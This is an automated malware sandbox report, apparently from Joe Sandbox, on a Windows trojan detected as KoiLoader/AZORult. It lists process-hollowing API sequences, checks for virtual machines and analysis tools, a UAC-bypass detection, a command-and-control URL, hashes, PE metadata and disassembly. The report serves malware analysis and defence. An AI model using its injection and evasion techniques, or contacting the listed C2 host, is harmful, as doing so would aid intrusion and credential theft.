                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_001576CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001576CB

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_01095C50 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_01095C50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe0_2_010993B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_010993B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_010993B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00155125 cpuid 0_2_00155125
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_00154D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00154D70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exeCode function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_010989B0
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    11
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection
                    1
                    Access Token Manipulation
                    LSASS Memory231
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    11
                    Process Injection
                    Security Account Manager11
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Account Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Owner/User Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync12
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Bypass User Account Control
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe78%VirustotalBrowse
                    SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe79%ReversingLabsWin32.Trojan.AZORult
                    SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe100%AviraHEUR/AGEN.1317648
                    SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://217.195.153.196/academy.phptrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://217.195.153.196/assetsSecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exetrue
                        unknown
                        http://217.195.153.196/academy.php%temp%SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://217.195.153.196/assets/cSecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            No contacted IP infos
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1541791
                            Start date and time:2024-10-25 06:31:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winEXE@1/0@0/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 5
                            • Number of non-executed functions: 62
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):5.888796953554703
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
                            File size:193'024 bytes
                            MD5:9e70e823876c7e83bf254d1f8fcbb3e5
                            SHA1:dba226d7c283e53478e3f0b02b1ec8a8260dea57
                            SHA256:fe75dacf62cfc6a628f60b49a8c670c55d3ab06ec825ea7d35b132bc8951626e
                            SHA512:e33765646229cbb57407307cf6414ce12f0d51f9d21b457ba15620b52017359a85969ad80af3191169c29950737d08823a63f35ed4ff218bb48da55f86a535f0
                            SSDEEP:3072:8A+MPNsjU+g/Pu92PkWMW50y4jrv34ClUCe3/VIvse7UUkKwYgO9ZvwvRGSCv:TJPxktlKdppYvDwv8SCv
                            TLSH:37145C1B73D1483DD4B202322D76E9D4A93CFE244691CDEF63392C1E9AB02E165B18F6
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oaN`+. 3+. 3+. 3`x#2!. 3`x%2.. 3`x$2?. 3..$29. 3..#2?. 3..%2.. 3`x!2,. 3+.!3A. 3..)2*. 3...3*. 3+..3*. 3.."2*. 3Rich+. 3.......
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x4049b4
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66CDD42B [Tue Aug 27 13:27:07 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:66deda4204cb009d8c01c3f28c17567f
                            Instruction
                            call 00007F1E78B37CF9h
                            jmp 00007F1E78B3776Fh
                            push ebp
                            mov ebp, esp
                            push 00000000h
                            call dword ptr [0041305Ch]
                            push dword ptr [ebp+08h]
                            call dword ptr [00413058h]
                            push C0000409h
                            call dword ptr [0041300Ch]
                            push eax
                            call dword ptr [00413014h]
                            pop ebp
                            ret
                            push ebp
                            mov ebp, esp
                            sub esp, 00000324h
                            push 00000017h
                            call dword ptr [00413060h]
                            test eax, eax
                            je 00007F1E78B378F7h
                            push 00000002h
                            pop ecx
                            int 29h
                            mov dword ptr [0041BAB8h], eax
                            mov dword ptr [0041BAB4h], ecx
                            mov dword ptr [0041BAB0h], edx
                            mov dword ptr [0041BAACh], ebx
                            mov dword ptr [0041BAA8h], esi
                            mov dword ptr [0041BAA4h], edi
                            mov word ptr [0041BAD0h], ss
                            mov word ptr [0041BAC4h], cs
                            mov word ptr [0041BAA0h], ds
                            mov word ptr [0041BA9Ch], es
                            mov word ptr [0041BA98h], fs
                            mov word ptr [0041BA94h], gs
                            pushfd
                            pop dword ptr [0041BAC8h]
                            mov eax, dword ptr [ebp+00h]
                            mov dword ptr [0041BABCh], eax
                            mov eax, dword ptr [ebp+04h]
                            mov dword ptr [0041BAC0h], eax
                            lea eax, dword ptr [ebp+08h]
                            mov dword ptr [0041BACCh], eax
                            mov eax, dword ptr [ebp-00000324h]
                            mov dword ptr [0041BA08h], 00010001h
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x19c900x3c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000x14814.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000x1248.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x18ac00x38.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x18a000x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x130000x120.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x110f80x11200f74d11cfe8e6d8e71072a0f11d9c7e99False0.5522496578467153data6.540620762088607IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x130000x730c0x740043bad7cdc02fea52ffa73e87a7e3367cFalse0.44396551724137934OpenPGP Public Key4.906263467320942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x1b0000x168c0xa0005e197c695a0d6994051ad539ab3ce55False0.176953125data2.3864029716696016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x1d0000x148140x14a00b3651ed889e1f7fe6b50a2c6ad5e489dFalse0.48055160984848483data4.861136097888206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x320000x12480x140076ad3658e65dc48ccae7781fa560593eFalse0.7134765625data6.282640625763616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_DIALOG0x1d1180x168dataEnglishUnited States0.6333333333333333
                            RT_RCDATA0x1d2800x14dataEnglishUnited States1.45
                            RT_RCDATA0x1d2940x14400dataEnglishUnited States0.4818431712962963
                            RT_MANIFEST0x316940x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                            DLLImport
                            KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
                            GDI32.dllLPtoDP
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            No network behavior found

                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Target ID:0
                            Start time:00:32:13
                            Start date:25/10/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe"
                            Imagebase:0x150000
                            File size:193'024 bytes
                            MD5 hash:9E70E823876C7E83BF254D1F8FCBB3E5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.6%
                              Dynamic/Decrypted Code Coverage:18%
                              Signature Coverage:16.5%
                              Total number of Nodes:1380
                              Total number of Limit Nodes:8
                              execution_graph 11501 154838 11502 154844 ___scrt_is_nonwritable_in_current_image 11501->11502 11527 154b95 11502->11527 11504 15499e 11568 154e89 IsProcessorFeaturePresent 11504->11568 11505 15484b 11505->11504 11515 154875 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 11505->11515 11507 1549a5 11572 1584d4 11507->11572 11512 154894 11513 154915 11535 154f9e 11513->11535 11515->11512 11515->11513 11551 1584ae 11515->11551 11516 15491b 11539 153c30 11516->11539 11522 15493b 11523 154944 11522->11523 11559 158489 11522->11559 11562 154d06 11523->11562 11528 154b9e 11527->11528 11578 155125 IsProcessorFeaturePresent 11528->11578 11532 154baf 11533 154bb3 11532->11533 11588 155b1d 11532->11588 11533->11505 11648 155b70 11535->11648 11537 154fb1 GetStartupInfoW 11538 154fc4 11537->11538 11538->11516 11650 153670 11539->11650 11542 153c76 ExitProcess 11543 153c6b GetLastError 11543->11542 11544 153c7e BuildCommDCBAndTimeoutsA 11543->11544 11545 153c91 GetCurrentProcess TerminateProcess 11544->11545 11546 153ca0 11544->11546 11545->11546 11739 151710 11546->11739 11550 153cb1 11557 154fd4 GetModuleHandleW 11550->11557 11552 1584c4 ___scrt_is_nonwritable_in_current_image _unexpected 11551->11552 11552->11513 12560 1590ba GetLastError 11552->12560 11558 154937 11557->11558 11558->11507 11558->11522 12949 158308 11559->12949 11563 154d12 11562->11563 11564 15494c 11563->11564 13020 158ab4 11563->13020 11564->11512 11566 154d20 11567 155b1d ___scrt_uninitialize_crt 7 API calls 11566->11567 11567->11564 11569 154e9f __CreateFrameInfo 11568->11569 11570 154f4a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11569->11570 11571 154f8e __CreateFrameInfo 11570->11571 11571->11507 11573 158308 __CreateFrameInfo 21 API calls 11572->11573 11574 1549ab 11573->11574 11575 158498 11574->11575 11576 158308 __CreateFrameInfo 21 API calls 11575->11576 11577 1549b3 11576->11577 11579 154baa 11578->11579 11580 155afe 11579->11580 11594 156d07 11580->11594 11583 155b07 11583->11532 11585 155b0f 11586 155b1a 11585->11586 11608 156d43 11585->11608 11586->11532 11589 155b26 11588->11589 11590 155b30 11588->11590 11591 155db9 ___vcrt_uninitialize_ptd 6 API calls 11589->11591 11590->11533 11592 155b2b 11591->11592 11593 156d43 ___vcrt_uninitialize_locks DeleteCriticalSection 11592->11593 11593->11590 11595 156d10 11594->11595 11597 156d39 11595->11597 11598 155b03 11595->11598 11612 156f4c 11595->11612 11599 156d43 ___vcrt_uninitialize_locks DeleteCriticalSection 11597->11599 11598->11583 11600 155d86 11598->11600 11599->11598 11629 156e5d 11600->11629 11603 155d9b 11603->11585 11606 155db6 11606->11585 11609 156d4e 11608->11609 11611 156d6d 11608->11611 11610 156d58 DeleteCriticalSection 11609->11610 11610->11610 11610->11611 11611->11583 11617 156d72 11612->11617 11615 156f84 InitializeCriticalSectionAndSpinCount 11616 156f6f 11615->11616 11616->11595 11618 156d8f 11617->11618 11621 156d93 11617->11621 11618->11615 11618->11616 11619 156dfb GetProcAddress 11619->11618 11621->11618 11621->11619 11622 156dec 11621->11622 11624 156e12 LoadLibraryExW 11621->11624 11622->11619 11623 156df4 FreeLibrary 11622->11623 11623->11619 11625 156e29 GetLastError 11624->11625 11626 156e59 11624->11626 11625->11626 11627 156e34 11625->11627 11626->11621 11627->11626 11628 156e4a LoadLibraryExW 11627->11628 11628->11621 11630 156d72 ___vcrt_InitializeCriticalSectionEx 5 API calls 11629->11630 11631 156e77 11630->11631 11632 156e90 TlsAlloc 11631->11632 11633 155d90 11631->11633 11633->11603 11634 156f0e 11633->11634 11635 156d72 ___vcrt_InitializeCriticalSectionEx 5 API calls 11634->11635 11636 156f28 11635->11636 11637 156f43 TlsSetValue 11636->11637 11638 155da9 11636->11638 11637->11638 11638->11606 11639 155db9 11638->11639 11640 155dc9 11639->11640 11641 155dc3 11639->11641 11640->11603 11643 156e98 11641->11643 11644 156d72 ___vcrt_InitializeCriticalSectionEx 5 API calls 11643->11644 11645 156eb2 11644->11645 11646 156eca TlsFree 11645->11646 11647 156ebe 11645->11647 11646->11647 11647->11640 11649 155b87 11648->11649 11649->11537 11649->11649 11765 153ce0 11650->11765 11653 153ce0 41 API calls 11654 1536de 11653->11654 11769 1530a0 11654->11769 11660 15374d 11661 153ce0 41 API calls 11660->11661 11662 153761 11661->11662 11663 153ce0 41 API calls 11662->11663 11664 15377d 11663->11664 11665 153ce0 41 API calls 11664->11665 11666 153796 11665->11666 11824 153410 11666->11824 11669 153ce0 41 API calls 11670 1537d0 11669->11670 11831 153450 11670->11831 11673 153ce0 41 API calls 11674 1537fc 11673->11674 11856 153640 11674->11856 11677 153ce0 41 API calls 11678 15381d 11677->11678 11859 152a80 11678->11859 11687 153cc0 task 39 API calls 11688 1538ac 11687->11688 11689 153ce0 41 API calls 11688->11689 11690 1538d5 11689->11690 11691 153ce0 41 API calls 11690->11691 11692 1538f1 11691->11692 11693 153ce0 41 API calls 11692->11693 11694 15390a 11693->11694 11899 152d00 11694->11899 11697 153ce0 41 API calls 11698 153932 11697->11698 11699 153ce0 41 API calls 11698->11699 11700 153950 11699->11700 11912 152de0 11700->11912 11705 153ce0 41 API calls 11706 1539b0 11705->11706 11707 153ce0 41 API calls 11706->11707 11708 1539cc 11707->11708 11941 151bc0 11708->11941 11711 153ce0 41 API calls 11712 153a41 11711->11712 11713 153ce0 41 API calls 11712->11713 11714 153a6f 11713->11714 11964 151dd0 11714->11964 11723 153cc0 task 39 API calls 11724 153b3e 11723->11724 11725 153ce0 41 API calls 11724->11725 11726 153b50 11725->11726 12106 1527e0 11726->12106 11729 153ce0 41 API calls 11730 153b89 11729->11730 11731 153ce0 41 API calls 11730->11731 11732 153bad 11731->11732 12109 152810 11732->12109 11735 153cc0 task 39 API calls 11736 153bd8 11735->11736 12117 152950 11736->12117 12263 151110 GetModuleHandleA 11739->12263 11741 15173c 11742 151110 17 API calls 11741->11742 11745 151750 11742->11745 11743 1575a0 ___std_exception_destroy 14 API calls 11744 151848 11743->11744 11746 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11744->11746 11747 157928 ___std_exception_copy 15 API calls 11745->11747 11756 15183c 11745->11756 11748 151855 11746->11748 11749 15178f 11747->11749 11758 154704 11748->11758 12269 151300 GetModuleHandleA VirtualAlloc 11749->12269 11756->11743 11759 15470d IsProcessorFeaturePresent 11758->11759 11760 15470c 11758->11760 11762 1549fb 11759->11762 11760->11550 12559 1549be SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11762->12559 11764 154ade 11764->11550 11766 153d15 11765->11766 12132 154090 11766->12132 11770 153ce0 41 API calls 11769->11770 11771 1530df 11770->11771 11772 153ce0 41 API calls 11771->11772 11773 1530f0 11772->11773 11774 153ce0 41 API calls 11773->11774 11776 153101 11774->11776 11775 153cc0 task 39 API calls 11777 153168 11775->11777 11776->11775 11778 153cc0 task 39 API calls 11777->11778 11779 153174 11778->11779 11780 153cc0 task 39 API calls 11779->11780 11781 153180 11780->11781 11782 153cc0 task 39 API calls 11781->11782 11783 15318c 11782->11783 11784 153cc0 task 39 API calls 11783->11784 11785 15319b 11784->11785 11786 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11785->11786 11787 1531b3 11786->11787 11788 1531c0 11787->11788 11789 153ce0 41 API calls 11788->11789 11790 153205 11789->11790 11791 153ce0 41 API calls 11790->11791 11792 153219 11791->11792 11793 153ce0 41 API calls 11792->11793 11794 15322a 11793->11794 11795 153ce0 41 API calls 11794->11795 11796 153268 11795->11796 11797 153ce0 41 API calls 11796->11797 11798 153285 11797->11798 11799 153cc0 task 39 API calls 11798->11799 11800 1532a6 11799->11800 11801 153cc0 task 39 API calls 11800->11801 11802 1532b5 11801->11802 11803 153ce0 41 API calls 11802->11803 11804 153333 11803->11804 11805 153ce0 41 API calls 11804->11805 11806 153353 11805->11806 11807 153cc0 task 39 API calls 11806->11807 11808 15337d 11807->11808 11809 153cc0 task 39 API calls 11808->11809 11811 15338c 11809->11811 11810 153ce0 41 API calls 11812 1533bd 11810->11812 11811->11810 11813 153cc0 task 39 API calls 11812->11813 11814 1533d2 11813->11814 11815 153cc0 task 39 API calls 11814->11815 11816 1533de 11815->11816 11817 153cc0 task 39 API calls 11816->11817 11818 1533ed 11817->11818 11819 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 11818->11819 11820 153405 11819->11820 11821 153cc0 11820->11821 12245 153dc0 11821->12245 11823 153ccf task 11823->11660 11825 153cc0 task 39 API calls 11824->11825 11826 153432 11825->11826 11827 153cc0 task 39 API calls 11826->11827 11828 15343a 11827->11828 11829 153cc0 task 39 API calls 11828->11829 11830 153442 11829->11830 11830->11669 11832 153ce0 41 API calls 11831->11832 11833 153499 11832->11833 11834 153ce0 41 API calls 11833->11834 11835 1534e9 11834->11835 11836 153ce0 41 API calls 11835->11836 11837 153506 11836->11837 11838 153cc0 task 39 API calls 11837->11838 11839 153527 11838->11839 11840 153cc0 task 39 API calls 11839->11840 11843 153536 11840->11843 11841 153ce0 41 API calls 11842 15356a 11841->11842 11844 153ce0 41 API calls 11842->11844 11843->11841 11845 153587 11844->11845 11846 153cc0 task 39 API calls 11845->11846 11847 1535a8 11846->11847 11848 153cc0 task 39 API calls 11847->11848 11850 1535b7 11848->11850 11849 153cc0 task 39 API calls 11851 15360e 11849->11851 11850->11849 11852 153cc0 task 39 API calls 11851->11852 11853 15361d 11852->11853 11854 154704 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 